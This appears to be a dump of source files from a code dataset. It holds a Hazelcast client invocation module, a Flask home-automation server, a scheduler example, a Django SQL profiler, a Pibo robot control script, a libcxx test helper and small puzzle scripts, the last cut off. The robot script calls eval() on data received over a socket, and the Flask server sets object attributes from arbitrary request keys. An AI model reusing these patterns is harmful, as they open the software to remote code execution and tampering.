self._invoke_on_random_connection(invocation)\n\n if not invoked:\n invoked = self._invoke_on_random_connection(invocation)\n\n if not invoked:\n self._handle_exception(invocation, IOError(\"No connection found to invoke\"))\n except Exception as e:\n self._handle_exception(invocation, e)\n\n def _invoke_non_smart(self, invocation):\n if not invocation.timeout:\n invocation.timeout = self._invocation_timeout + time.time()\n\n try:\n if not invocation.urgent:\n self._check_invocation_allowed_fn()\n\n connection = invocation.connection\n if connection:\n invoked = self._send(invocation, connection)\n if not invoked:\n self._handle_exception(invocation, IOError(\"Could not invoke on connection %s\" % connection))\n return\n\n if not self._invoke_on_random_connection(invocation):\n 
self._handle_exception(invocation, IOError(\"No connection found to invoke\"))\n except Exception as e:\n self._handle_exception(invocation, e)\n\n def _init_invocation_retry_pause(self):\n invocation_retry_pause = self._client.properties.get_seconds_positive_or_default(\n self._client.properties.INVOCATION_RETRY_PAUSE_MILLIS)\n return invocation_retry_pause\n\n def _init_invocation_timeout(self):\n invocation_timeout = self._client.properties.get_seconds_positive_or_default(\n self._client.properties.INVOCATION_TIMEOUT_SECONDS)\n return invocation_timeout\n\n def _send(self, invocation, connection):\n if self._shutdown:\n raise HazelcastClientNotActiveError()\n\n correlation_id = self._next_correlation_id.get_and_increment()\n message = invocation.request\n message.set_correlation_id(correlation_id)\n message.set_partition_id(invocation.partition_id)\n self._pending[correlation_id] = invocation\n\n if invocation.event_handler:\n self._listener_service.add_event_handler(correlation_id, invocation.event_handler)\n\n self.logger.debug(\"Sending %s to %s\", message, connection, extra=self._logger_extras)\n\n if not connection.send_message(message):\n if invocation.event_handler:\n self._listener_service.remove_event_handler(correlation_id)\n return False\n return True\n\n def _handle_exception(self, invocation, error, traceback=None):\n if self.logger.isEnabledFor(logging.DEBUG):\n self.logger.debug(\"Got exception for request %s, error: %s\" % (invocation.request, error),\n extra=self._logger_extras)\n\n if not self._client.lifecycle_service.is_running():\n invocation.set_exception(HazelcastClientNotActiveError(), traceback)\n self._pending.pop(invocation.request.get_correlation_id(), None)\n return\n\n if not self._should_retry(invocation, error):\n invocation.set_exception(error, traceback)\n self._pending.pop(invocation.request.get_correlation_id(), None)\n return\n\n if invocation.timeout < time.time():\n self.logger.debug(\"Error will not be retried because invocation timed out: %s\", error,\n extra=self._logger_extras)\n invocation.set_exception(HazelcastTimeoutError(\"Request timed out because an error occurred after \"\n \"invocation timeout: %s\" % error, traceback))\n self._pending.pop(invocation.request.get_correlation_id(), None)\n return\n\n invoke_func = functools.partial(self.invoke, invocation)\n self._reactor.add_timer(self._invocation_retry_pause, invoke_func)\n\n def _should_retry(self, invocation, error):\n if invocation.connection and isinstance(error, (IOError, TargetDisconnectedError)):\n return True\n\n if invocation.uuid and isinstance(error, TargetNotMemberError):\n return False\n\n if isinstance(error, (IOError, HazelcastInstanceNotActiveError)) or is_retryable_error(error):\n return True\n\n if isinstance(error, TargetDisconnectedError):\n return invocation.request.retryable or self._is_redo_operation\n\n return False\n","sub_path":"hazelcast/invocation.py","file_name":"invocation.py","file_ext":"py","file_size_in_byte":9936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"255200325","text":"from flask import Flask, render_template, redirect, request, jsonify\nimport time\nimport sys\nimport logging\n#from scipy import signal\nimport __main__ as main\nimport Alarm\n\napp = Flask(__name__, static_url_path='/static')\nrooms = []\n\n#initialize global variables\ndef init():\n global rooms\n for key in main.rooms:\n if 'lights' in main.rooms[key]:\n rooms.append(key)\n return None\n\n#Make sure the browser does 
not cache any of the images.\n#Prevents non updating measurement graphs\n@app.after_request\ndef add_header(response):\n response.cache_control.max_age = 1\n return response\n\n@app.route('/')\ndef homePage():\n global rooms\n return render_template('index.html',\n rooms=rooms,\n page=\"home\")\n\n#handle to show the graphs of every room and the pi\n@app.route('/graphs')\ndef graphs():\n global rooms\n return render_template('index.html',\n rooms = rooms,\n page='graphs')\n\n#Here are the handles for alarms\n@app.route('/alarm')\ndef alarm():\n global rooms\n Alarms = [key for key in Alarm.AlarmDict.keys()]\n return render_template('index.html',\n rooms = rooms,\n alarms = Alarms,\n page = 'alarm')\n\n@app.route('/alarm/setAlarm', methods=[\"POST\"])\ndef setAlarm():\n JSON = request.get_json(force=True)\n if not ( (\"Hour\" in JSON) and (\"Minute\" in JSON) ):\n return (\"\", 204)\n Hour = JSON[\"Hour\"]\n Minute = JSON[\"Minute\"]\n PreWakeUp = JSON.get(\"PreWakeUp\", None)\n Alarm.setupAlarm(Hour, Minute, PreWakeUp=PreWakeUp)\n return(\"\", 418)\n\n@app.route('/alarm/disableAlarm', methods=[\"POST\"])\ndef disableAlarm():\n JSON = request.get_json(force=True)\n if not \"AlarmName\" in JSON:\n return(\"\",204)\n Alarm.AlarmDict[JSON[\"AlarmName\"]][\"Stop\"] = True\n return(\"\",204)\n\n#From here on all the light handles begin\n@app.route('/rooms/')\ndef ledPage(roomID):\n global rooms\n if (roomID in rooms):\n Lights = {}\n for Light in [*main.rooms[roomID]['lights']]:\n Lights[Light] = main.rooms[roomID][\"lights\"][Light].functdict.keys()\n print(Lights)\n return render_template('index.html',\n rooms = rooms,\n roomID = roomID,\n lights = [*main.rooms[roomID]['lights']],\n functdict = main.rooms[roomID]['lights']['LedStrip'].functdict,\n color_rgb = main.rooms[roomID]['lights']['LedStrip'].color_rgb,\n wait = main.rooms[roomID]['lights']['LedStrip'].wait,\n page='led')\n else:\n return('404 not found, you have not installed this light')\n\n\n\n@app.route('/rooms/color', methods=[\"POST\"])\n# expect JSON in the following format:\n# {'roomID':A rooms defined in main\n# 'lightIDs':A list of lightIDs defined in main,\n# 'r': 0, 'g':0, 'b':0}\ndef colorControl():\n color = {'r':0,'g':0,'b':0}\n json = request.get_json(force=True)\n for key in color:\n color[key] = int(json[key])\n lightIDs = json['lightIDs']\n roomID = json['roomID']\n for lightID in lightIDs:\n main.rooms[roomID]['lights'][lightID].color_rgb = color\n return(\"\",204)\n\n@app.route('/rooms/function', methods=[\"POST\"])\ndef functionControl():\n #expect JSON with following format\n #{'roomID': A room defined in main.\n # 'lightIDs': A list of lightIDs defined in main.\n # 'function': An accepted function for the light}\n function = \"\"\n json = request.get_json(force=True)\n roomID = json['roomID']\n lightIDs = json['lightIDs']\n function = json['function']\n for lights in lightIDs:\n main.rooms[roomID]['lights'][lights].function = function\n return(\"\",204)\n\n@app.route('/rooms/attrNum', methods=[\"POST\"])\ndef attributeControlNum():\n #expect JSON with following format\n # {'roomID': A room defined in main,\n # 'lightIDs': A list of lightIDs defined in main.\n # 'key':value -> key is the variable that needs to be set to value\n # }\n json = request.get_json(force=True)\n roomID = json['roomID']\n lightIDs = json['lightIDs']\n json.pop('roomID', None)\n json.pop('lightIDs', None)\n attributes={}\n for key,value in json.items():\n attributes[key] = value\n #try:\n for lights in lightIDs:\n for key,value in 
attributes.items():\n setattr(main.rooms[roomID]['lights'][lights],\n key,\n float(value))\n #except:\n # pass\n return(\"\",204)\n\n@app.route('/rooms/attrBool', methods=[\"POST\"])\ndef attributeControlBool():\n #expect JSON with following format\n # {'roomID': A room defined in main,\n # 'lightIDs': A list of lightIDs defined in main.\n # 'key':value -> key is the variable that needs to be set to value\n # }\n\n json = request.get_json(force=True)\n roomID = json['roomID']\n lightIDs = json['lightIDs']\n json.pop('roomID', None)\n json.pop('lightIDs', None)\n attributes={}\n for key,value in json.items():\n attributes[key] = value\n try:\n for lights in lightIDs:\n for key,value in attributes.items():\n setattr(main.rooms[roomID]['lights'][lights],\n key,\n bool(value))\n except:\n pass\n return(\"\",204)\n\n@app.route('/rooms/data', methods=[\"POST\"])\ndef returnData():\n # expect json with only the room ID in it, return with the data in json\n json = request.get_json(force=True)\n try:\n roomID = json['roomID']\n if roomID in main.rooms:\n response = {}\n response.update(main.rooms[roomID][\"room\"].json)\n if \"lightID\" in json:\n response.update({\"color\": main.rooms[roomID][\"lights\"][json[\"lightID\"]].color_rgb})\n return(jsonify(response), 200)\n else:\n return(\"\",418) #I'm a teapot\n except:\n return(jsonify({'error': 'invalid'}), 200)\n\n@app.route('/rooms/graphData', methods=[\"POST\"])\ndef returnGraphData():\n # expect json with roomID\n JSON = request.get_json(force = True)\n RoomID = JSON[\"RoomID\"]\n Items = int(JSON.get(\"Items\", 1000))\n print(\"Items: {}\".format(Items))\n print(\"RoomID: {}\".format(RoomID))\n Data, Time = main.rooms[RoomID][\"room\"].getDataFromDB(Items = Items)\n # Temperature = signal.savgol_filter(Data[\"temperature\"], 25, 3)\n # Humidity = signal.savgol_filter(Data[\"humidity\"], 25, 3)\n # LDR = signal.savgol_filter(Data[\"ldr\"], 25, 3)\n Temperature = Data[\"temperature\"]\n Humidity = Data[\"humidity\"]\n LDR = Data[\"ldr\"]\n Graphs = [\n dict(\n data=[\n dict(\n x = Time,\n y = Temperature,\n name = \"Temperature\",\n yaxis = \"Temperature\",\n type = \"lines\"\n ),\n dict(\n x = Time,\n y = Humidity,\n name = \"Humidity\",\n yaxis = \"y2\",\n type = \"lines\"\n )\n ],\n layout = dict(\n title = \"Temperature and Humidity\",\n yaxis = {\"title\": \"Degree Celsius\"},\n xaxis = {\"automargin\": True},\n yaxis2 = dict(\n title = \"Relative Humidity\",\n overlaying = \"y\",\n side = \"right\"\n )\n )\n ),\n dict(\n data=[\n dict(\n x = Time,\n y = LDR,\n name = \"LDR\",\n yaxis = \"LDR\",\n type = \"lines\"\n )\n ],\n layout = dict(\n title = \"LDR\",\n xaxis = {\"automargin\": True},\n yaxis = {\"title\": \"Relative light strength\"},\n showlegend = True\n )\n )\n ]\n\n GraphsJSON = jsonify(Graphs)\n return(GraphsJSON)\n\n@app.route('/ritregistration')\ndef ritRegistration():\n global rooms\n return render_template('index.html',\n rooms = rooms,\n page='ritRegistration')\n\n@app.route('/ritregistration/addNew', methods=[\"POST\"])\ndef addNewMileage():\n #expects json with \"KMStand\", \"BeginEindPunt\", \"Getankt\"\n json = request.get_json(force=True)\n try:\n KMStand = json[\"KMStand\"]\n BeginEndPoint = json[\"BeginEindPunt\"]\n Tanked = json[\"Getankt\"]\n main.RitReg.insertMileage(KMStand, BeginEndPoint, Tanked)\n return(\"\",418)\n except Exception as e:\n return(e,400)\n\n@app.route('/ritregistration/getData')\ndef returnRitData():\n DataList = main.RitReg.getAllData()\n DataList.reverse()\n return(jsonify(DataList), 
200)\n\n@app.route('/ritregistration/getMileage')\ndef returnMileAge():\n    MileAges, MileAge = main.RitReg.averageMileage()\n    return(jsonify({\"Mileage\": MileAge, \"Mileages\": MileAges}), 200)\n","sub_path":"LedServer/Website/WEB.py","file_name":"WEB.py","file_ext":"py","file_size_in_byte":8968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"188740978","text":"## Works on Linux only\n## File name: cron01.py\n\n#pip install apscheduler\n\nfrom apscheduler.schedulers.blocking import BlockingScheduler\nimport time\n# Install apscheduler and import it\n# First write a function, then register it on the scheduler via add_job\n# When registering, pass interval or minute/second settings along with it, and the function's output is produced at that interval or at those minute/second marks\n\n\n# First, write a function that prints hello world.\n# Running something more complex than a print should work here just as well.\ndef exec_interval(): \n    print(\"hello world\")\n    \n# Write a second function. (optional)\n# The time.localtime function returns the current local time\ndef exec_cron(): \n    str = time.strftime('%c', time.localtime(time.time()))\n    print(\"cron\", str)\n\nsched = BlockingScheduler()\n# Call the exec_interval() function every 10 seconds\n# Add the function defined above\nsched.add_job(exec_interval, 'interval', seconds=10)\n\n# Cron-style scheduling (runs every minute while the seconds are between 20 and 30)\n# Add one more job\nsched.add_job(exec_cron, 'cron', minute=\"*\", second=\"20-30\")\nsched.start()","sub_path":"web_practice/crawling/cron01.py","file_name":"cron01.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"313731809","text":"from .core import exceptions\nfrom .core.logger import sql_logger\n\n\n\"\"\" Decorator used to monkey patch the Django SQLCompiler.\n\nArgs:\n    Accepts and passes on all arguments, the only one being used is the first\n    positional argument which is the `self` class reference, the Django SQLCompiler\nReturns:\n    decorated Django SQLCompiler class.\nRaises:\n    Nothing\n\n\"\"\"\ndef profiler_wrapper(func):\n    def inner(*args, **kwargs):\n        compiler = args[0]\n\n        try:\n            sql_string = compiler.as_sql()[0]\n        except EmptyResultSet:\n            sql_string = 'EmptyResultSet raised from Django'\n\n        sql_logger(\n            compiler.using,\n            compiler.query.model,\n            sql_string\n        )\n\n        return func(*args, **kwargs)\n    return inner\n\ntry:\n    from django.db.models.sql.compiler import SQLCompiler, SQLInsertCompiler, SQLUpdateCompiler\n    from django.db.models.sql.datastructures import EmptyResultSet\n\n    # decorate any SQL compilers that have an `execute_sql` method\n    SQLCompiler.execute_sql = profiler_wrapper(SQLCompiler.execute_sql)\n    SQLInsertCompiler.execute_sql = profiler_wrapper(SQLInsertCompiler.execute_sql)\n    SQLUpdateCompiler.execute_sql = profiler_wrapper(SQLUpdateCompiler.execute_sql)\nexcept:\n    raise exceptions.DjangoImportException('Could not import Django SQLCompiler')\n","sub_path":"django_orm_profiler/profiler.py","file_name":"profiler.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"307012483","text":"#!/usr/bin/python\n# >>stt\n'''\nset GOOGLE_APPLICATION_CREDENTIALS=C:/home/pi/Downloads/vast-verve-320303-b594822e4a04.json\nexport GOOGLE_APPLICATION_CREDENTIALS=\"/home/pi/Downloads/vast-verve-320303-b594822e4a04.json\"\n'''\n# set GOOGLE_APPLICATION_CREDENTIALS=C:/home/pi/Downloads/vast-verve-320303-b594822e4a04.json\n\n# gcloud auth activate-service-account --key-file=\"/home/pi/Downloads/vast-verve-320303-b594822e4a04.json\"\n\n# export 
GOOGLE_APPLICATION_CREDENTIALS=\"/home/pi/Downloads/vast-verve-320303-b594822e4a04.json\"\n\n# >>tts\n\n# vast-verve-320303-5b57752cb55a // .json\n\n# /home/pi/Downloads/vast-verve-320303-5b57752cb55a.json\n\n# 가상환경 활성화 source test/bin/activate\n\nfrom __future__ import division\n\nimport pandas as pd\nimport threading\nimport alsaaudio\nimport pyaudio\nimport pyttsx3\nimport socket\nimport numpy\nimport time\nimport pygame\nimport sys\nimport cv2\nimport ast\nimport re\nimport os\nimport gspeech\nfrom google.cloud import speech\nfrom six.moves import queue\n\n# 상위 디렉토리 추가 (for utils.config)\nsys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))\nfrom utils.config import Config as cfg\n\nsys.path.append(cfg.OPENPIBO_PATH + '/lib')\nfrom vision.visionlib import cCamera\nfrom motion.motionlib import cMotion\nfrom audio.audiolib import cAudio\nfrom oled.oledlib import cOled\nfrom speech.speechlib import cSpeech\nfrom speech.speechlib import cDialog\n\noObj = cOled(conf=cfg)\nm = cMotion(conf=cfg)\n'''\ndef playSound(filename):\n pygame.mixer.music.load(filename)\n pygame.mixer.music.play()\n\ndef tts_f():\n pygame.mixer.init()\n playSound('5m.mp3')\n time.sleep(30.0)\n'''\ndata_pd = pd.read_excel('/home/pi/openpibo-data/proc/dialog.xls', header = None) # names = ['명령어', '대답', '종료여부', '모션'])\ncmdLists = pd.DataFrame.to_numpy(data_pd)\n\n# 이거 안 씀 motion_flag = 0 # 모션 동작 연속적으로 할 수 있게 하는 flag\n# 이거 안 씀 count_flag = 0\n# 이거 안 씀 wait = 0\n\n###변수 선언부###\nstatus_speak_mode = 2 # 전역 / 안내모드 : 1, 일상모드 : 0 / cmdLists[i][3] 2: 대기모드\nflag_action = 0\nmotion_once = 0\nr_arm = -70\nr_hand = -25\nl_arm = 70\nl_hand = 25\n\nR_ARM_P = 8\nR_ARM_D = 0.05\nrepeat = 0 # 안내모드 시 순차적 동작 실행하는데 쓰임 \n\nr_arm_p = R_ARM_P # 파이보 모션 제어 \nr_arm_d = R_ARM_D\nl_arm_p = R_ARM_P\nr_hand_p = 4\nl_hand_p = r_hand_p\nr_hand_d = 1\n\nglobal_vol = 0\n\ndef speak(msg,num,voice):\n tObj = cSpeech(conf=cfg)\n filename = cfg.TESTDATA_PATH+\"/test.mp3\"\n print(\"voice : \", voice)\n tObj.tts(\"\\\n \"+msg+\"\\\n \"\\\n , filename)\n aObj = cAudio()\n # audio.setvolume(voice)\n # current_volume = audio.getvolume() # Get the current Volume\n # print(\"current_volume :\", current_volume)\n\n aObj.play(filename, out='local', volume=global_vol)\n time.sleep(num)\n \ndef CommandProc(stt):\n global flag_action, repeat\n global status_speak_mode, global_vol\n # 문자 양쪽 공백 제거\n cmd = stt.strip()\n # 입력 받은 문자 화면에 표시\n \n print('나 : ' + str(cmd))\n for i in range(len(cmdLists)):\n if cmdLists[i][0] in str(cmd):\n \n status_speak_mode = int(cmdLists[i][3]) \n print ('구글 스피치 : ' + cmdLists[i][1])\n print(\"global_vol : \", global_vol)\n speak(cmdLists[i][1], len(cmdLists[i][1])/5, global_vol)\n \n \n print(\"\\n>>말해주세요~\")\n print(\"cmdLists[i][3] : \", cmdLists[i][3])\n gsp.resumeMic()\n return cmdLists[i][2]\n # 리스트에 없는 명령어일 경우 \n print ('구글 스피치 : 무슨 얘기하는 거니?')\n speak('무슨이야기 하는거니?', 1, global_vol)\n status_speak_mode = 2\n time.sleep(2)\n gsp.resumeMic()\n print(\"\\n>>말해주세요~\")\n return 1\n\n\n\ndef eye_tracking(r_arm, r_hand, motionData_x, motionData_y, l_arm, l_hand):\n MT = 300\n \n global flag_action, motion_once\n global status_speak_mode\n # print(\"------------\")\n # print(\"status_speak_mode(tracking): \", status_speak_mode)\n \n if status_speak_mode == 1 and motion_once == 0 : # 안내모드 일 때 \n motion_once += 1\n oObj.draw_image(cfg.TESTDATA_PATH +\"/i2.JPEG\")\n oObj.show() # oled 띄우는 것 \n m.set_motion(name=\"guide2\", cycle=1)\n motion_once = 0\n status_speak_mode = 2\n \n \n elif status_speak_mode == 0 and 
motion_once == 0 : # daily mode\n        motion_once += 1\n        oObj.draw_image(cfg.TESTDATA_PATH +\"/conversation.png\")\n        oObj.show() # show it on the OLED\n        m.set_motion(name=\"clapping2\", cycle=1)\n        motion_once = 0\n        status_speak_mode = 2\n\n    elif status_speak_mode == 2: # no voice input: just keep tracking; breathing mode\n        # print(\"r_hand, l_hand: \", r_hand, l_hand)\n        m.set_motors(positions=[0,0,-70,r_hand, motionData_x, motionData_y,0,0,70,l_hand], movetime=MT) \n        oObj.draw_image(cfg.TESTDATA_PATH +\"/pibo_logo.png\") \n        oObj.show() # show it on the OLED\n        \n        \n\"\"\"end of the Google Speech helper functions\"\"\"\n\n# IP address and port of the server (receiver) to connect to\nTCP_IP = '192.168.0.79'\nTCP_PORT = 5001\n# prepare a socket for sending\nsock = socket.socket()\nsock.connect((TCP_IP,TCP_PORT))\n# grab images from the webcam using OpenCV\n\ncapture = cv2.VideoCapture(0)\n\nm.set_motors(positions=[0,0,-70,-25,0,0,0,0,70,25], movetime=500)\n\ntime.sleep(3)\nmotion_list = []\n\naudio = alsaaudio.Mixer()\ncurrent_volume = audio.getvolume() # Get the current Volume\naudio.setvolume(30) # Set the volume to 30%.\n\n# Audio recording parameters\nRATE = 16000\nCHUNK = int(RATE / 10)  # 100ms\n\ntext = pyttsx3.init()\n\n'''\n# speech rate\ntext.setProperty('rate', 150)\nrate = text.getProperty('rate')\n# voice\nvoices = text.getProperty('voices')\n# text.setProperty('voice', voices[0].id) # male\ntext.setProperty('voice', 'english+f1') # female\n# text.setProperty('voice', voices[1].id) # female\n'''\n\ngsp = gspeech.Gspeech()\ndef main(): \n    while True:\n        # wait until speech has been recognized\n        stt = gsp.getText()\n        if stt is None:\n            break\n        gsp.pauseMic()\n        time.sleep(0.01)\n        CommandProc(stt)\n\n        # exit the program when the quit command ('끝내자') comes in\n        if ('끝내자' in stt):\n            break\n    \nSTT = threading.Thread(target = main) # Google Speech thread\nSTT.start()\nwhile True :\n    \n    ret, frame = capture.read()\n    frame = cv2.flip(frame,0)\n\n    # encode the captured image into a string (JPEG)\n    encode_param=[int(cv2.IMWRITE_JPEG_QUALITY),90]\n    result, imgencode = cv2.imencode('.jpg', frame, encode_param)\n    data = numpy.array(imgencode)\n    stringData = data.tostring()\n\n    # send the encoded image over the socket\n    sock.send( str(len(stringData)).ljust(16).encode())\n    sock.send( stringData )\n\n    # check whether motion data arrived from the Pibo\n    people = sock.recv(1).decode(\"utf8\")\n    # print(\"motion_send : \", people)\n\n    if people != '0' and people != '':\n        \n        # receive motion data from the Pibo\n        motion_list = sock.recv(1024)\n        # print(\"motion_list : \", motion_list)\n        motion_list = eval(motion_list)\n        motionData_x = int(motion_list[0])\n        motionData_y = int(motion_list[1])\n        vol = int(motion_list[2])\n        global_vol = vol\n        motion_list = []\n        \n        if status_speak_mode == 2 : \n            # idle breathing animation while the Pibo sits still\n            if l_hand < -20 or l_hand > 25 :\n                l_hand_p = -1 * l_hand_p\n                # print(\">>l_hand_p :\", l_hand_p)\n            l_hand -= l_hand_p\n            r_hand = -1 * l_hand\n            \n\n        eye_track = threading.Thread(target=eye_tracking, args=(r_arm, r_hand, motionData_x, motionData_y, l_arm, l_hand))\n        eye_track.start()\n    else :\n        if status_speak_mode == 2 : \n            # idle breathing animation while the Pibo sits still\n            if l_hand < -20 or l_hand > 25 :\n                l_hand_p = -1 * l_hand_p\n                # print(\">>l_hand_p :\", l_hand_p)\n            l_hand -= l_hand_p\n            r_hand = -1 * l_hand\n\n        eye_track = threading.Thread(target=eye_tracking, args=(r_arm, r_hand, 0, 0, l_arm, l_hand))\n        eye_track.start()\n    \ncv2.destroyAllWindows() \nsock.close()\n","sub_path":"openpibo-example/speech/restrict_new.py","file_name":"restrict_new.py","file_ext":"py","file_size_in_byte":8621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"597123193","text":"\nimport lit.util\n\n\nclass 
CXXCompiler(object):\n def __init__(self, path, flags=[], compile_flags=[], link_flags=[], use_ccache=False):\n self.path = path\n self.flags = list(flags)\n self.compile_flags = list(compile_flags)\n self.link_flags = list(link_flags)\n self.use_ccache = use_ccache\n self.type = None\n self.version = (None, None, None)\n self._initTypeAndVersion()\n\n def _initTypeAndVersion(self):\n # Get compiler type and version\n macros = self.dumpMacros()\n if macros is None:\n return\n compiler_type = None\n major_ver = minor_ver = patchlevel = None\n if '__clang__' in macros.keys():\n compiler_type = 'clang'\n # Treat apple's llvm fork differently.\n if '__apple_build_version__' in macros.keys():\n compiler_type = 'apple-clang'\n major_ver = macros['__clang_major__']\n minor_ver = macros['__clang_minor__']\n patchlevel = macros['__clang_patchlevel__']\n elif '__GNUC__' in macros.keys():\n compiler_type = 'gcc'\n major_ver = macros['__GNUC__']\n minor_ver = macros['__GNUC_MINOR__']\n patchlevel = macros['__GNUC_PATCHLEVEL__']\n self.type = compiler_type\n self.version = (major_ver, minor_ver, patchlevel)\n\n def _basicCmd(self, infiles, out, is_link=False):\n cmd = []\n if self.use_ccache and not is_link:\n cmd += ['ccache']\n cmd += [self.path]\n if out is not None:\n cmd += ['-o', out]\n if isinstance(infiles, list):\n cmd += infiles\n elif isinstance(infiles, str):\n cmd += [infiles]\n else:\n raise TypeError('infiles must be a string or list')\n return cmd\n\n def preprocessCmd(self, infiles, out=None, flags=[]):\n cmd = self._basicCmd(infiles, out) + ['-x', 'c++', '-E']\n cmd += self.flags + self.compile_flags + flags\n return cmd\n\n def compileCmd(self, infiles, out=None, flags=[]):\n cmd = self._basicCmd(infiles, out) + ['-x', 'c++', '-c']\n cmd += self.flags + self.compile_flags + flags\n return cmd\n\n def linkCmd(self, infiles, out=None, flags=[]):\n cmd = self._basicCmd(infiles, out, is_link=True)\n cmd += self.flags + self.link_flags + flags\n return cmd\n\n def compileLinkCmd(self, infiles, out=None, flags=[]):\n cmd = self._basicCmd(infiles, out, is_link=True) + ['-x', 'c++']\n cmd += self.flags + self.compile_flags + self.link_flags + flags\n return cmd\n\n def preprocess(self, infiles, out=None, flags=[], env=None, cwd=None):\n cmd = self.preprocessCmd(infiles, out, flags)\n out, err, rc = lit.util.executeCommand(cmd, env=env, cwd=cwd)\n return cmd, out, err, rc\n\n def compile(self, infiles, out=None, flags=[], env=None, cwd=None):\n cmd = self.compileCmd(infiles, out, flags)\n out, err, rc = lit.util.executeCommand(cmd, env=env, cwd=cwd)\n return cmd, out, err, rc\n\n def link(self, infiles, out=None, flags=[], env=None, cwd=None):\n cmd = self.linkCmd(infiles, out, flags)\n out, err, rc = lit.util.executeCommand(cmd, env=env, cwd=cwd)\n return cmd, out, err, rc\n\n def compileLink(self, infiles, out=None, flags=[], env=None, cwd=None):\n cmd = self.compileLinkCmd(infiles, out, flags)\n out, err, rc = lit.util.executeCommand(cmd, env=env, cwd=cwd)\n return cmd, out, err, rc\n\n def dumpMacros(self, infiles=None, flags=[], env=None, cwd=None):\n if infiles is None:\n infiles = '/dev/null'\n flags = ['-dM'] + flags\n cmd, out, err, rc = self.preprocess(infiles, flags=flags, env=env,\n cwd=cwd)\n if rc != 0:\n return None\n parsed_macros = dict()\n lines = [l.strip() for l in out.split('\\n') if l.strip()]\n for l in lines:\n assert l.startswith('#define ')\n l = l[len('#define '):]\n macro, _, value = l.partition(' ')\n parsed_macros[macro] = value\n return parsed_macros\n\n def 
getTriple(self):\n cmd = [self.path] + self.flags + ['-dumpmachine']\n return lit.util.capture(cmd).strip()\n","sub_path":"test/libcxx/test/compiler.py","file_name":"compiler.py","file_ext":"py","file_size_in_byte":4327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"608476935","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nReads lines of input.txt and writes whether brackets are nested correctly to output.txt \n\"\"\"\n__author__ = \"ElizabethS5\"\n\nimport sys\n\n\ndef get_lines(filename):\n \"\"\"Open and read txt file, return list of lines\"\"\"\n f = open(filename, \"r\")\n lines = f.read().split('\\n')\n f.close()\n return lines\n\n\ndef string_to_list(string):\n \"\"\"Takes a string and puts characters in a list\"\"\"\n line_list = []\n copy = string[:]\n while copy:\n if copy[:2] == '(*' or copy[:2] == '*)':\n line_list.append(copy[:2])\n copy = copy[2:]\n else:\n line_list.append(copy[0])\n copy = copy[1:]\n return line_list\n\n\ndef test_line_list(line_list):\n \"\"\"If line_list passes return 'Yes' else return 'No' and failing position\"\"\"\n copy = line_list[:]\n stack = []\n position = 1\n while copy:\n if copy[0][-1] in '>}])':\n if len(stack) == 0:\n return f\"NO {position}\"\n elif copy[0] == '>' and stack[-1] == '<':\n stack.pop()\n elif copy[0] == ']' and stack[-1] == '[':\n stack.pop()\n elif copy[0] == '}' and stack[-1] == '{':\n stack.pop()\n elif copy[0] == ')' and stack[-1] == '(':\n stack.pop()\n elif copy[0] == '*)' and stack[-1] == '(*':\n stack.pop()\n else:\n return f\"NO {position}\"\n elif copy[0][0] in '<{[(':\n if len(copy) == 1:\n return f\"NO {position}\"\n else:\n stack.append(copy[0])\n position += 1\n copy.pop(0)\n if len(stack) != 0:\n return f'NO {position}'\n else:\n return 'YES'\n\n\ndef write_output(string):\n \"\"\"Write string to file\"\"\"\n f = open('output.txt', 'w')\n f.write(string)\n f.close()\n\n\ndef main(args):\n \"\"\"Use input.txt to write output.txt\"\"\"\n lines_from_input = get_lines('input.txt')\n line_lists = [string_to_list(line) for line in lines_from_input]\n output = '\\n'.join([test_line_list(line_list)\n for line_list in line_lists])\n write_output(output)\n\n\nif __name__ == '__main__':\n main(sys.argv)\n","sub_path":"nested.py","file_name":"nested.py","file_ext":"py","file_size_in_byte":2246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"231374509","text":"# python3\r\n\r\nimport sys\r\n\r\n\r\nclass Table:\r\n def __init__(self,id,rows):\r\n self._id = id\r\n self._rows = rows\r\n\r\n\r\ndef getParent(table):\r\n while table != parent[table]:\r\n parent[table] = getParent(parent[table])\r\n table = parent[table]\r\n\r\n return table\r\n\r\ndef merge(destination, source):\r\n global maxRows\r\n i_id = getParent(destination)\r\n j_id = getParent(source)\r\n\r\n if i_id == j_id:\r\n return\r\n\r\n if rank[i_id] > rank[j_id]:\r\n parent[j_id] = i_id\r\n tables[i_id]._rows += tables[j_id]._rows\r\n if maxRows < tables[i_id]._rows:\r\n maxRows = tables[i_id]._rows\r\n else:\r\n parent[i_id] = j_id\r\n tables[j_id]._rows += tables[i_id]._rows\r\n if maxRows < tables[j_id]._rows:\r\n maxRows = tables[j_id]._rows\r\n\r\n if rank[i_id] == rank[j_id]:\r\n rank[j_id] += 1\r\n\r\n\r\nn, m = map(int, sys.stdin.readline().split())\r\nlines = list(map(int, sys.stdin.readline().split()))\r\nrank = [1] * n\r\nparent = list(range(0, n))\r\ntables = [Table(i,rowCount) for i,rowCount in 
